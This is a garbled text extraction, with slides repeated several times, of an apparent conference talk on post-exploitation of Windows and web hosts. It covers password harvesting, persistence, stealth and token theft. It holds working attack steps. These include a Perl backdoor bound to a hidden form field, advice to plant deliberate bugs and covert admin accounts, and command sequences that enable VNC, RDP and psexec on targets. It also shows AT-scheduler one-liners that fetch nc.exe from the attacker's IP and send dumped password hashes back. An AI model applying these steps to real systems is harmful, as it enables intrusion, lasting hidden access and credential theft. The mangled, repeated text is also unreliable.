bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
